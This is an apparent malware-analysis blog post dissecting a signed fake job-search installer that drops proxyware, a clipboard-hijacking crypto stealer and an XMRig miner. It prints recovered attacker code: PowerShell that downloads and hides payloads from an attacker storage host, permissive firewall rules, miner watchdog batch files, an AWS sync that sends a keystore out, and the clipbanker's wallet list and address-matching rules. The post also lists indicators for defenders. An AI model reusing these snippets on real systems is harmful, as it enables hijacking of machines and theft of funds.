Signed job search application deploys a Proxyware, ClipBanker and XMRig cryptominer

07/02/2026 · ~17 min read
Tags: advancedinstaller, signed, evasion, ghidra, proxyware, clipbanker, miner, cryptominer, xmrig, malware analysis
Sponsored By Hudson Rock

Hudson Rock offers free cybercrime intelligence (including infostealers). Thanks to their support I can spend more time creating valuable content.

Online sandbox analysis

I came across this post on Reddit where someone shared the VirusTotal link and requested help with removing it and mitigating the consequences.

VT scan

Judging purely from some of the SIGMA rules we can confirm this is malicious:

  • Powershell Base64 Encoded MpPreference Cmdlet - Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modify or tamper with Windows Defender AV
  • Windows Defender Exclusions Added - PowerShell - Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions

There is, of course, no reason for job search software to tamper with Windows Defender.

I looked the file up on Threat.rip, a very nice website that bulk submits the file to services such as AnyRun, VirusTotal, Hybrid Analysis, UnpacMe and a few more.

Let's check AnyRun - generally my go-to sandboxes are VirusTotal, AnyRun and Triage.

AnyRun

I got overwhelmed by the number of flags this triggered, but one stands out in particular: the Detects AdvancedInstaller (YARA) signature. This will save us plenty of time when getting to the next stage of this malware.

Static extraction of main payload(s)

Just like before, we are going to be using a Windows 10 FlareVM. You can find FlareVM here.

I downloaded the sample from AnyRun, extracted it and renamed it temporarily to CadastrarCurriculo.exe.infected just so I don't execute it by accident.

I decided to use a Python script to extract Advanced Installer files available at this GitHub link.

advancedinstaller extraction

advancedinstaller extraction

Now we have extracted the CadastrarCurriculo.ini configuration file and a folder containing a ZIP archive, which in turn contains a file named, drum roll, CadastrarCurriculo.msi (VirusTotal).

advancedinstaller extraction

I tried inspecting the MSI package with LessMSI just like I did previously but I was surprised to see that there were no files bundled inside.

I researched and found MsiDb.exe - learn.microsoft.com, but unfortunately that didn't return anything for me either.

DiE

DetectItEasy identified several PEs inside the MSI, so there had to be something. I found Orca - a database table editor for creating and editing Windows Installer packages and merge modules - learn.microsoft.com, where I was finally able to find the hidden PEs and other additional information.

Extracted MSI package

Seems like AdvancedInstaller was also used for the MSI package.

DiE

Here we have some download links, filepaths and filenames. We will be looking at these a little later.

DiE

Here we have the scheduled tasks it creates for the files we just discovered.

DiE

Here we have the binaries embedded in the MSI. I was able to extract and save them by right-clicking the line and writing it to disk.

Malicious URL discovery

DiE

Here we have a viewer.exe mention and a possibly malicious URL.

https[:]//vagasflix.com/og.php?u=/cl/i/melo5w

This seems like a C2 or other related URL. While observing this malware's behavior in the AnyRun sandbox, the URL was opened in the web browser.

Thanks to this URL find, I found out about this thread:

https://www.reddit.com/r/golpe/comments/1mdk428/%C3%A9_seguro_executar_arquivos_exe/?tl=en

It seems like the malware was active for at least 7 months and that this URL, which does present itself as a job search website, is actually a malware delivery site.

When we look at communicating files for the malicious URL, we can see many of these CadastrarCurriculo.exe files - same filename as the file we discovered.

https://www.virustotal.com/gui/domain/vagasflix.com/relations

After rescanning some of the files, all are identified by ESET as the same signature - PowerShell/TrojanDownloader.Agent.PCS Trojan which is the same as the file we are analyzing. With this info, we can assume that the VagasFlix URL is indeed a malicious site constructed primarily for delivering this signed malware.

This is confirmed by this AnyRun scan, where one of the users opened the malicious URL and clicked through to the known CadastrarCurriculo.exe download.

VagasFlix opened URL

When opened by the viewer.exe component, the URL just displays a bunch of buttons that lead to various (likely sponsored) products.

Continuing through extracted MSI package

directory declarations

Here we have the declared directories this malware uses.

VM check

Here we have a VM check. Not sure how advanced it is, but it prevented installation on FlareVM (which is not surprising: a plain Hyper-V VM with FlareVM on it would not pass any VM checks at all, as it isn't built for analyzing VM-aware malware).

PowerShell payload analysis

DiE

PS payload #1

Here we discovered some PowerShell commands. There are a few of them, so I will add some code snippets and explain what they do.

$appCompatPaths = @(
    "$env:PROGRAMDATA\BraveCrashHandler.exe",
    "$env:APPDATA\GoogleCrashHandler.exe",
    "$env:USERPROFILE\APPDATA\LOCAL\TEMP\dIlhost.exe",
    "$env:SystemRoot\TEMP\dIlhost.exe",
    "$env:APPDATA\GoogleCrashHandler64.exe",
    "$env:USERPROFILE\APPDATA\LOCAL\TEMP\dlIhost.exe",
    "$env:SystemRoot\TEMP\dlIhost.exe",
    "$env:USERPROFILE\Embedit.exe",
    "$env:LOCALAPPDATA\SheIlExperienceHost.exe",
    "$env:APPDATA\ShelIHost.exe"
)

The first command sets all the listed files to always run as administrator using registry keys.

$filesToCheck = @(
    @{Path="$env:PROGRAMDATA\BraveCrashHandler.exe"; Url="https://fsn1.your-objectstorage.com/f06fc1b7/BraveCrashHandler.exe"},
    @{Path="$env:APPDATA\GoogleCrashHandler.exe"; Url="https://fsn1.your-objectstorage.com/f06fc1b7/GoogleCrashHandler.exe"},
    @{Path="$env:APPDATA\GoogleCrashHandler64.exe"; Url="https://fsn1.your-objectstorage.com/f06fc1b7/GoogleCrashHandler64.exe"},
    @{Path="$env:USERPROFILE\Embedit.exe"; Url="https://fsn1.your-objectstorage.com/f06fc1b7/Embedit.exe"},
    @{Path="$env:LOCALAPPDATA\SheIlExperienceHost.exe"; Url="https://fsn1.your-objectstorage.com/f06fc1b7/SheIlExperienceHost.exe"},
    @{Path="$env:APPDATA\ShelIHost.exe"; Url="https://fsn1.your-objectstorage.com/f06fc1b7/ShelIHost.exe"}
  )

This loop checks whether each of the files we discovered earlier already exists; if not, it downloads it from the listed URL, and in both cases it then sets the Hidden and System attributes on the file:

foreach ($file in $filesToCheck) {
    if (-Not (Test-Path -Path $file.Path -PathType Leaf)) {
        Download-File -Url $file.Url -Destination $file.Path
    }
    (Get-ChildItem $file.Path).Attributes = 'Hidden','System'
}

PS payload #2

In the next file, we also discover some previously unseen files:

$additionalFilesToHide = @(
    "$env:PROGRAMDATA\BraveCrashHandler.exe",
    "$env:APPDATA\GoogleCrashHandler.exe",
    "$env:USERPROFILE\APPDATA\LOCAL\TEMP\dIlhost.exe",
    "$env:SystemRoot\TEMP\dIlhost.exe",
    "$env:APPDATA\GoogleCrashHandler64.exe",
    "$env:USERPROFILE\APPDATA\LOCAL\TEMP\dlIhost.exe",
    "$env:SystemRoot\TEMP\dlIhost.exe",
    "$env:USERPROFILE\Embedit.exe",
    "$env:USERPROFILE\APPDATA\LOCAL\TEMP\myst-launcher-amd64.exe",
    "$env:SystemRoot\TEMP\myst-launcher-amd64.exe",
    "$env:USERPROFILE\.myst_node_launcher",
    "$env:LOCALAPPDATA\SheIlExperienceHost.exe",
    "$env:APPDATA\ShelIHost.exe"
)

The myst related files sparked my interest. I researched and found out this:

A Mysterium Node is a device you run at home, like your computer, phone, or Raspberry Pi. It connects you to the Mysterium Network and helps keep it running.

Most of the internet you pay for each month goes unused. By running a node, you can share that spare internet with others in the network. People can connect to your node to:

  • Use a VPN for safe and private browsing

  • Access the open internet freely

  • Create secure lines of communication

In simple terms, a node works like a server, but it belongs to you instead of a big company.

Source: https://help.mystnodes.com/en/articles/8005096-what-is-a-mysterium-node

With this installed, attackers are able to abuse your device as a VPN exit node, which makes it proxyware. Just to verify this statement, I dropped the executable on VirusTotal and I was correct: it is indeed the Mysterium Node launcher.

PS payload #3

These firewall rules are added to ensure smooth communication between the Myst Launcher and its servers.

New-NetFirewallRule -Name "Windows Credentials Service" -DisplayName "Windows Credentials Service" -Group "Windows Credentials Service" -Program "$env:USERPROFILE\APPDATA\LOCAL\TEMP\myst-launcher-amd64.exe" -Direction Inbound -Profile Any -Action Allow -Enabled True
New-NetFirewallRule -Name "Windows Credentials Service Manager" -DisplayName "Windows Credentials Service Manager" -Group "Windows Credentials Service Manager" -Program "$env:USERPROFILE\APPDATA\LOCAL\TEMP\myst-launcher-amd64.exe" -Direction Outbound -Profile Any -Action Allow -Enabled True

New-NetFirewallRule -Name "Windows Media Synchronization" -DisplayName "Windows Media Synchronization" -Group "Windows Media Synchronization" -Program "$env:SystemRoot\TEMP\myst-launcher-amd64.exe" -Direction Inbound -Profile Any -Action Allow -Enabled True
New-NetFirewallRule -Name "Windows Media Synchronization Service" -DisplayName "Windows Media Synchronization Service" -Group "Windows Media Synchronization Service" -Program "$env:SystemRoot\TEMP\myst-launcher-amd64.exe" -Direction Outbound -Profile Any -Action Allow -Enabled True

New-NetFirewallRule -Name "myst_launcher_tcp" -DisplayName "myst_launcher_tcp" -Program "$env:USERPROFILE\.mysterium-bin\myst.exe" -Direction Inbound -Profile Public -Protocol TCP -Action Allow -Enabled True
New-NetFirewallRule -Name "myst_launcher_udp" -DisplayName "myst_launcher_udp" -Program "$env:USERPROFILE\.mysterium-bin\myst.exe" -Direction Inbound -Profile Public -Protocol UDP -Action Allow -Enabled True

New-NetFirewallRule -Name "myst.exe" -DisplayName "myst.exe" -Program "$env:USERPROFILE\.mysterium-bin\myst.exe" -Direction Inbound -Profile Public -Protocol TCP -Action Allow -Enabled True
New-NetFirewallRule -Name "myst.exe" -DisplayName "myst.exe" -Program "$env:USERPROFILE\.mysterium-bin\myst.exe" -Direction Inbound -Profile Public -Protocol UDP -Action Allow -Enabled True

New-NetFirewallRule -Name "Network Discovery Service" -DisplayName "Network Discovery Service" -Group "Network Discovery Service" -LocalPort 80, 443, 2020, 3333, 4444, 5555, 4449, 4050 -Direction Inbound -Profile Any -Protocol TCP -Action Allow -Enabled True
New-NetFirewallRule -Name "Network Discovery Control" -DisplayName "Network Discovery Control" -Group "Network Discovery Control" -LocalPort 80, 443, 2020, 3333, 4444, 5555, 4449, 4050 -Direction Outbound -Profile Any -Protocol TCP -Action Allow -Enabled True
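Two signals run through the file lists in PS payload #1/#2 and the -Program paths in the firewall rules above: the names dIlhost.exe, dlIhost.exe, SheIlExperienceHost.exe and ShelIHost.exe imitate dllhost.exe, ShellExperienceHost.exe and ShellHost.exe by swapping a lowercase l for a capital I, and every path sits in a user-writable location rather than System32. The triage helper below is an added example, not the sample's code or the post's own tooling; the reference name set is an assumption, and the sample paths and abbreviated rule lines are constructed from the listings above.

```python
import re

# Constructed sample: paths from the $appCompatPaths / $additionalFilesToHide lists and two
# abbreviated New-NetFirewallRule lines from the post (one with -Program, one port-only).
SAMPLE_PATHS = [
    r"$env:PROGRAMDATA\BraveCrashHandler.exe",
    r"$env:USERPROFILE\APPDATA\LOCAL\TEMP\dIlhost.exe",
    r"$env:SystemRoot\TEMP\dlIhost.exe",
    r"$env:LOCALAPPDATA\SheIlExperienceHost.exe",
    r"$env:APPDATA\ShelIHost.exe",
    r"$env:USERPROFILE\.mysterium-bin\myst.exe",
]
SAMPLE_RULES = [
    r'New-NetFirewallRule -Name "Windows Credentials Service" -Program '
    r'"$env:USERPROFILE\APPDATA\LOCAL\TEMP\myst-launcher-amd64.exe" -Direction Inbound -Action Allow',
    r'New-NetFirewallRule -Name "Network Discovery Service" -LocalPort 80, 443, 2020 -Direction Inbound',
]

# Assumption: legitimate binary names that the dropped files imitate (not taken from the post).
REFERENCE_NAMES = {"dllhost.exe", "shellexperiencehost.exe", "shellhost.exe"}

# Locations a standard user can write to; the PowerShell $env: prefixes are kept unexpanded.
USER_WRITABLE_ROOTS = ("$env:PROGRAMDATA\\", "$env:APPDATA\\", "$env:LOCALAPPDATA\\",
                       "$env:USERPROFILE\\", "$env:SystemRoot\\TEMP\\", "$env:TEMP\\")


def normalise_name(name: str) -> str:
    """Collapse the capital-I / lowercase-l homoglyph pair, then lowercase."""
    return name.replace("I", "l").lower()


def lookalike_of(name: str):
    """Reference name this file name imitates via an I/l swap, or None for an exact or unknown name."""
    norm = normalise_name(name)
    return norm if norm in REFERENCE_NAMES and name.lower() != norm else None


def in_user_writable(path: str) -> bool:
    p = path.upper()
    return any(p.startswith(root.upper()) for root in USER_WRITABLE_ROOTS)


def program_from_rule(rule: str):
    """Extract the -Program path from a New-NetFirewallRule line, or None if it is port-only."""
    m = re.search(r'-Program\s+"([^"]+)"', rule)
    return m.group(1) if m else None


def triage(path: str) -> dict:
    name = path.rsplit("\\", 1)[-1]
    return {"path": path, "lookalike_of": lookalike_of(name), "user_writable": in_user_writable(path)}


def flagged(paths, rules):
    """All paths (listed directly or taken from firewall -Program) that show either signal."""
    items = list(paths) + [p for p in (program_from_rule(r) for r in rules) if p]
    return [t for t in (triage(p) for p in items) if t["lookalike_of"] or t["user_writable"]]


if __name__ == "__main__":
    for hit in flagged(SAMPLE_PATHS, SAMPLE_RULES):
        print(hit)
```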

PS payload #4

script.b64 execution

During Event Viewer analysis I noticed one more command proactively being run:

function Set-ExecutionPolicy { param([Parameter(ValueFromRemainingArguments=$true)][object[]]$args) }; $ProgressPreference = 'SilentlyContinue'; $PollMs = 1000; $b = Get-Content 'C:\Users\rift\Desktop\script.b64' -Raw; $c = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)); Invoke-Expression $c

This means the file C:\Users\rift\Desktop\script.b64 had to exist at some point. You may now ask why it would be on the desktop (it would be obvious to the user), and that is because I started the unpacked executable on the desktop, so it assumes that the desktop is its main directory.

script.b64

I looked into Event Viewer once again and I was able to discover the executed script. It is one of the more sophisticated clipbanker malware samples.

$Messages = @{
  '*'        = '0xbae44Bc0aa9CC20B8CFa112D9Ad3b43Ef9B0C3fE'
  EVM        = '0xbae44Bc0aa9CC20B8CFa112D9Ad3b43Ef9B0C3fE'
  BTC_TAP    = 'bc1ps7ma79me3a0f0n40k4mdsmlz968f7mv73v3vz7f4c9vha8lhsfjqukmr7d'
  BTC_BECH   = 'bc1q307qxe4hpf6ye82477f42c6nsgezvz6gfm2z5x'
  BTC_P2SH   = '3QnHvEvvP8jBBVvug5pcT7oUjgKgXeDB9j'
  BTC_P2PKH  = '1Hj4coh59fFsydhttH5h9iMWSwPgtkYHz'
  BNB        = '0xbae44Bc0aa9CC20B8CFa112D9Ad3b43Ef9B0C3fE'
  SOL        = '4KMHsMauguHCb1pM1AeVCAFumY3wbMAiMHmyYX4Nd897'
  DOT        = '16S2ZD6BAonoHCyDPeXe8fXVCBRebqEDsXmKRd7tkTqjdGmJ'
  ADA        = 'addr1q8g8symm53utkluxt0l6hra40xxvsqd5tqyqw038suy8wuack7nf2vh437swuszyvazs9jwny9243hq3wpvt6uceqpqsfqd5pz'
  TRX        = 'TJzYHaewZTbWMdrwZE366hBfCQLvV8SHSt'
  TRX_HEX    = 'TJzYHaewZTbWMdrwZE366hBfCQLvV8SHSt'
  XMR        = '85kVoW2pdB9b5HiXxV3wd1jWyV1keE4guQvRvsXxcxg8EpELGt2i44QZ77iKSiZRQsDEG1TsLL2aHXvgDExUUbQE73W6Bv8'
  XMR_INT    = '85kVoW2pdB9b5HiXxV3wd1jWyV1keE4guQvRvsXxcxg8EpELGt2i44QZ77iKSiZRQsDEG1TsLL2aHXvgDExUUbQE73W6Bv8'
  AVAX_X     = 'avax1wqnrr4yq50nca7gqnm9fy86kt5hnanu7f2dzdw'
  AVAX_P     = 'avax1wqnrr4yq50nca7gqnm9fy86kt5hnanu7f2dzdw'
  XRP        = 'radBzBhjivekXKj1atfLjAiayRpX1vHd62'
  DOGE       = 'DEQiqiHi4riypyFWpWPsQDwhcHHyR1xEyM'
  TON        = 'UQBfOeiQb_z46KWjf4U5nA1TGVuetFkbedLxL1fwTYC9WQ8c'
  BCH        = 'qrsnpnz8f6exm2n9dr5ldxmtlnvr22r3cg3tlj8zuc'
}

Here we have the attacker's hardcoded wallets that it replaces the original ones with.

$Rules = @(
  @{ Name='BTC_TAP';   Pattern='^(?i:bc1p[ac-hj-np-z02-9]{58,74})$'; Validate={ param($s) (Test-BTC-Bech32 $s) } }
  @{ Name='BTC_BECH';  Pattern='^(?i:bc1q[ac-hj-np-z02-9]{25,74})$'; Validate={ param($s) (Test-BTC-Bech32 $s) } }
  @{ Name='BTC_P2SH';  Pattern='^3[1-9A-HJ-NP-Za-km-z]{25,34}$';     Validate={ param($s) (Test-Base58Check $s) } }
  @{ Name='BTC_P2PKH'; Pattern='^1[1-9A-HJ-NP-Za-km-z]{25,34}$';     Validate={ param($s) (Test-Base58Check $s) } }
  @{ Name='SOL';       Pattern='^[1-9A-HJ-NP-Za-km-z]{32,44}$';       Validate={ param($s) (Test-SOL-Base58Len32 $s) } }
  @{ Name='EVM';       Pattern='^(?i:0x[0-9a-f]{40})$';               Validate={ param($s) $true } }
  @{ Name='DOT';       Pattern='^[1-9A-HJ-NP-Za-km-z]{47,48}$';       Validate={ param($s) $true } }
  @{ Name='ADA';       Pattern='^(?i:(addr1|stake1)[0-9a-z]{20,})$';  Validate={ param($s) (Test-ADA-Bech32 $s) } }
  @{ Name='TRX';       Pattern='^T[1-9A-HJ-NP-Za-km-z]{33}$';         Validate={ param($s) (Test-Base58Check $s) } }
  @{ Name='TRX_HEX';   Pattern='^41[0-9a-fA-F]{40}$';                 Validate={ param($s) $true } }
  @{ Name='XMR';     Pattern='^(?:4|8)[1-9A-HJ-NP-Za-km-z]{94}$';   Validate={ param($s) $true } }
  @{ Name='XMR_INT'; Pattern='^4[1-9A-HJ-NP-Za-km-z]{105}$';        Validate={ param($s) $true } }
  @{ Name='AVAX_X';    Pattern='^(?i:X-avax1[0-9a-z]{39})$';          Validate={ param($s) (Test-AVAX-Bech32 $s) } }
  @{ Name='AVAX_P';    Pattern='^(?i:P-avax1[0-9a-z]{39})$';          Validate={ param($s) (Test-AVAX-Bech32 $s) } }
  @{ Name='XRP';       Pattern='^r[1-9A-HJ-NP-Za-km-z]{24,34}$';      Validate={ param($s) (Test-Base58Check $s) } }
  @{ Name='DOGE';      Pattern='^D[1-9A-HJ-NP-Za-km-z]{25,34}$';      Validate={ param($s) (Test-Base58Check $s) } }
  @{ Name='TON';       Pattern='^[EU]Q[A-Za-z0-9_-]{46}$';            Validate={ param($s) $true } }
  @{ Name='BNB';       Pattern='^bnb[0-9a-z]{39}$';                   Validate={ param($s) $true } }
  @{ Name='BCH';       Pattern='^(?i:(bitcoincash:)?[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{42,})$'; Validate={ param($s) $true } }
)

Here we have the regex patterns it uses to identify the address type.

It is worth noting that if the copied string's length is <25 or >200 it ignores it, to save CPU. The actual check goes like this:

  1. Checks whether it looks like, for example, a Bitcoin address using regex
  2. Checks whether the checksum is mathematically correct (yes, this is an actual thing)
  3. Pauses 250 milliseconds and goes back to step 1

There was one more PowerShell file present, but its only purpose was sanitizing the input, so I decided not to include it.

MSI packed files analysis

So, we extracted the PE files inside the MSI using Orca. It's time to inspect them.

file * on folder

We can see a few icons, DLLs, bitmap images and an executable. Icons are indeed icons, images are indeed images, so we are left with the DLLs and the EXE.

sigcheck on folder

I started running sigcheck on the EXE/DLL files and it seems like all are components of Advanced Installer. I double-checked the certificate and it is indeed from Advanced Installer.

To my surprise, all the files were signed by Advanced Installer.

sigcheck on folder 2

Even this viewer.exe file... Or maybe not? See the publisher? It is the same publisher as the original executable, and it doesn't match the other legitimate AdvancedInstaller components, which are published by "Caphyon SRL".

The real question is why viewer.exe was signed by this fake company. In the execution chain it serves no purpose other than launching a URL, and neither does the official version from AI.

It's been mentioned here and here that the official AdvancedInstaller also contains this viewer.exe file. My theory here is that the file is signed because, ultimately, without the valid signature that was displayed on the legitimate viewer.exe, it received false flags from lesser-known AV software, so this is their way of evading detection, even by signing an already legitimate file.

Ghidra analysis of viewer.exe

I decided to analyse the file in Ghidra. There is indeed no malicious functionality and it seems to do exactly what it promised. I won't go deep into showing the process of reversing it in Ghidra; it was a boring process with no sudden realizations - just confirmation of what I already thought.

Extracted strings:

\SystemTemp\
ntdll.dll
open
runas
%s\System32\cmd.exe
.cmd
.bat
/C ""%s" %s"
ShellExecuteInfo members:
FilePath:<
Verb:<
Directory:<
Parameters:<
Visible
Hidden
Window Visibility:
true
false
Call to ShellExecuteEx() returned:
Last error=
Invalid SID
kernel32
\\?\UNC\
\\?\
*.*
url
URL
URL Shortcut content:
http
mailto
> returned:
Call to ShellExecute() for verb<
0123456789abcdefghjkmnpqrstvwxyz
e!%x
/DIR 
/DontWait 
/EnforcedRunAsAdmin 
/RunAsAdmin 
/HideWindow
/LogFile
msiexec.exe

Ghidra URLcheck

Here we have a function that checks whether a URL is valid.

Ghidra URLcheck

Here is the function that checks for the http/mailto prefix.

Ghidra URLcheck

Here we have the switches themselves in the settings. This was ultimately just determining whether a given switch was used or not.

Ghidra URLcheck

Here is the actual main function that starts a CMD window with the arguments that determine what starts, whether it starts hidden, etc.

Downloaded payloads analysis

So, we went over:

  • the binary files in the MSI
  • the suspicious DLL signed by the high-risk certificate
  • the PowerShell commands and the clipbanker

Now, only the 4 downloaded payloads are remaining!

| Filename | SHA256 hash | VirusTotal |
| --- | --- | --- |
| Embedit.exe | ea50ee52fc0db2cab8f51d62c3e50a8854e74deb250d5bfc4d99ab50c559a091 | VT Link |
| GoogleCrashHandler.exe | 4ec2951bcfa225865a2582c2f0e84d52cc3031e299cbaed119861c58d6a503c4 | VT Link |
| GoogleCrashHandler64.exe | b9a3a3fb5d23537d37d4cf411bc45815261e7f80bb6c455bc6e01086aecd7db1 | VT Link |
| SheIlExperienceHost.exe | ca2efda753d4894612238e32370471b8cd514f4ea548e23dbf00429f4a7a4d81 | VT Link |

Just based on the VirusTotal scan, we can tell they are all packed by Enigma - Win64/Packed.Enigma.DS Trojan and we can also confirm this by running DetectItEasy on them:

DiE

Unpacking modern Enigma Protector is a very complicated and long process, which is outside the scope of this report. During string analysis of all 4, I noticed something very interesting that all 4 files shared:

str1

str2

A string containing a URL that belongs to Quick Batch File Compiler - https://www.abyssmedia.com/quickbfc. Most of these batch-to-executable converters work similarly to a dropper:

  1. The executable drops the embedded batch file, most of the time into the %temp% folder
  2. The executable calls the batch file
  3. The executable deletes the batch file once done

To my surprise, this was no different. I started the executables one by one, suspended the process immediately and successfully retrieved 3 batch files and 1 executable from the %temp% folder. We are going to assume that this is the only payload, because the specific string we found only allows bundling files, and because at no point during dynamic analysis did they perform any malicious activity other than dropping a file.

| Filename | SHA256 hash | VirusTotal |
| --- | --- | --- |
| 0N1VQNPQ.bat | bd52c55e005878726fa1ba1f55bd608cb78dbb254535e8c61c215b5f6f6b29bc | VT Link |
| 804T5D75.bat | 7c62c55eb84f41e303815a5b23cabb14d1f3419deae098e55622f8c037b6fc5a | VT Link |
| 0JMQJ1F5.bat | 581cf1ccebc59f9ff246413a8e1b685c04631b0edf0462ba87c6adbc8fce4e6f | VT Link |
| dlIhost.exe | a69a4a3ac2f8dcc168a17e1b07a839e268f8871fe63b9b56c306205f9d733ecf | VT Link |

Batch file #1

The first file is responsible for starting and configuring the Myst Launcher and checking that it keeps running.

:B
set MyProcess=myst-launcher-amd64.exe
tasklist | findstr /i "%MyProcess%"
if errorlevel 1 (
    goto :StartRoutine
)
timeout /t 60
goto :B

:StartRoutine
timeout /t 10

if exist "%Temp%\myst-launcher-amd64.exe" (
    start "" "%Temp%\myst-launcher-amd64.exe" -autorun
) else (
    if exist "%SystemRoot%\Temp\myst-launcher-amd64.exe" (
        start "" "%SystemRoot%\Temp\myst-launcher-amd64.exe" -autorun
    )
)

They also contain hardcoded AWS keys:

"%UserProfile%\.mysterium-docs\aws.exe" configure set AWS_ACCESS_KEY_ID IYUS2SYTE3E7DZID2U61
"%UserProfile%\.mysterium-docs\aws.exe" configure set AWS_SECRET_ACCESS_KEY 1gZpIsVZg63zyQyRjkgzfAdHsT1CpIkwcoBow9nh
"%UserProfile%\.mysterium-docs\aws.exe" --endpoint-url="https://fsn1.your-objectstorage.com" s3 sync "%UserProfile%\.mysterium-node\keystore" s3://d4fb01c2

Batch file #2

The second batch file is responsible for managing %SystemRoot%\Temp\dIlhost.exe, restarting it if it gets terminated.

@shift
@echo off
chcp 65001 >nul

:LOOP
tasklist /fi "IMAGENAME eq dIlhost.exe" | find /i "dIlhost.exe" >nul
if errorlevel 1 goto :StartRoutine
timeout /t 60 >nul
goto :LOOP

:StartRoutine
if exist "%Temp%\dIlhost.exe" (
    "%Temp%\dIlhost.exe"
) else if exist "%SystemRoot%\Temp\dIlhost.exe" (
    "%SystemRoot%\Temp\dIlhost.exe"
)
timeout /t 60 >nul
goto :LOOP

note: whole source code

The @shift on top is a very common thing with batch-to-exe converters.

Batch file #3

And as for the last batch file:

@shift
@echo off
setlocal

powershell -NoProfile -ExecutionPolicy Bypass -Command "function Set-ExecutionPolicy { param([Parameter(ValueFromRemainingArguments=$true)][object[]]$args) }; $ProgressPreference = 'SilentlyContinue'; $PollMs = 1000; $b = Get-Content '%~dp0script.b64' -Raw; $c = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)); Invoke-Expression $c"

endlocal
pause

We have already analyzed this command - it starts script.b64 from its own directory.

Executable file

xmrig

The dlIhost.exe executable isn't that interesting either. It was dropped by GoogleCrashHandler64.exe and it is a regular XMRig cryptominer.

We can see the whole execution chain and identification on this AnyRun scan. On VirusTotal's behavior tab we can also spot:

  • C:\Users\<USER>\.config\xmrig.json
  • C:\Users\<USER>\.xmrig.json

Final verdict

We've gone through many payloads. It's time to recap what we looked at.

This is a multi-payload, almost undetected malware with a valid digital signature (34.028.832 HIGOR PEREIRA MORAIS), distributed via a fake job search website, with the payloads consisting of:

  • proxyware - abuses legitimate software called Mysterium Node; results in the victim's network being used as a residential proxy/VPN
  • clipbanker - using PowerShell with regex and checksum validation covering up to 20 wallet types, it proactively monitors and replaces crypto wallet addresses in your clipboard
  • cryptojacker - an XMRig cryptominer is deployed and persistently restarted by a batch script

The file is slowly gaining detections, and after contacting Squiblydoo, owner of https://certgraveyard.org/, the certificate is now revoked.

IoC

Files:

| Filename | SHA256 hash | Description | VirusTotal link |
| --- | --- | --- | --- |
| CadastrarCurriculo.exe | 21e06c9ee37d2da327b5d2c8bea6d68d9674ab8b2243005ffb3e8ef7b8965675 | Signed, first stage of AdvancedInstaller | VT Link |
| CadastrarCurriculo.msi | 8d37465dd2b8c0d208093a583c900dc4b2bfa4dee2de12b1959a3541ff8eb1a5 | Signed, second stage AdvancedInstaller dropper & loader | VT Link |
| Embedit.exe | ea50ee52fc0db2cab8f51d62c3e50a8854e74deb250d5bfc4d99ab50c559a091 | Enigma-packed executable responsible for Myst Launcher configuration and start | VT Link |
| GoogleCrashHandler.exe | 4ec2951bcfa225865a2582c2f0e84d52cc3031e299cbaed119861c58d6a503c4 | Component for persistence and downloading additional modules | VT Link |
| GoogleCrashHandler64.exe | b9a3a3fb5d23537d37d4cf411bc45815261e7f80bb6c455bc6e01086aecd7db1 | Responsible for dropping the XMRig cryptominer (dlIhost.exe) | VT Link |
| SheIlExperienceHost.exe | ca2efda753d4894612238e32370471b8cd514f4ea548e23dbf00429f4a7a4d81 | Responsible for dropping and executing the PowerShell ClipBanker | VT Link |
| dlIhost.exe | a69a4a3ac2f8dcc168a17e1b07a839e268f8871fe63b9b56c306205f9d733ecf | XMRig cryptominer | VT Link |
| myst-launcher-amd64.exe | 84f41a3516629d92f2dbd7bc287dd61db2a8992da3edc0982db9002eef4043fb | Mysterium Node launcher | VT Link |
| viewer.exe | 1259486122934390eedf60d24fb91da16a738146460a93ee57b8cb8ea9a27a71 | Legitimate viewer but signed by the malicious cert; used to open the ad site after installation, does not exhibit other malicious behaviour | VT Link |
| 0N1VQNPQ.bat | bd52c55e005878726fa1ba1f55bd608cb78dbb254535e8c61c215b5f6f6b29bc | Mysterium Node configuration script | VT Link |
| 804T5D75.bat | 7c62c55eb84f41e303815a5b23cabb14d1f3419deae098e55622f8c037b6fc5a | XMRig watchdog | VT Link |
| 0JMQJ1F5.bat | 581cf1ccebc59f9ff246413a8e1b685c04631b0edf0462ba87c6adbc8fce4e6f | PowerShell loader for the clipbanker | VT Link |
| script.b64 | f9b700a5c6816fd0899892c4667d08df8f90c8b648f7d45ac019d5097957d337 | Clipbanker | VT Link |

URLs:

| URL | Type | Description |
| --- | --- | --- |
| vagasflix.com | Delivery URL | Main, legitimate-looking Portuguese job search site |
| https[:]//vagasflix.com/og.php?u=/cl/i/melo5w | Ad display URL | URL opened by viewer.exe that displays various ads |
| https[:]//fsn1.your-objectstorage.com/f06fc1b7/ | Payload delivery | S3 bucket where payload components are downloaded from |
| https[:]//fsn1.your-objectstorage.com | Exfiltration endpoint | Endpoint used to exfiltrate the keystore folder from Mysterium Node |
| xmr.shinrarigs.com | Miner pool | XMRig miner pool |
| gulf.moneroocean.stream | Miner pool | XMRig miner pool |
| xmr2.shinrarigs.com | Miner pool | XMRig miner pool |

Digital signatures

| Name | Description |
| --- | --- |
| 34.028.832 HIGOR PEREIRA MORAIS | High-risk certificate used for this malware |

Thank you for reading my analysis.
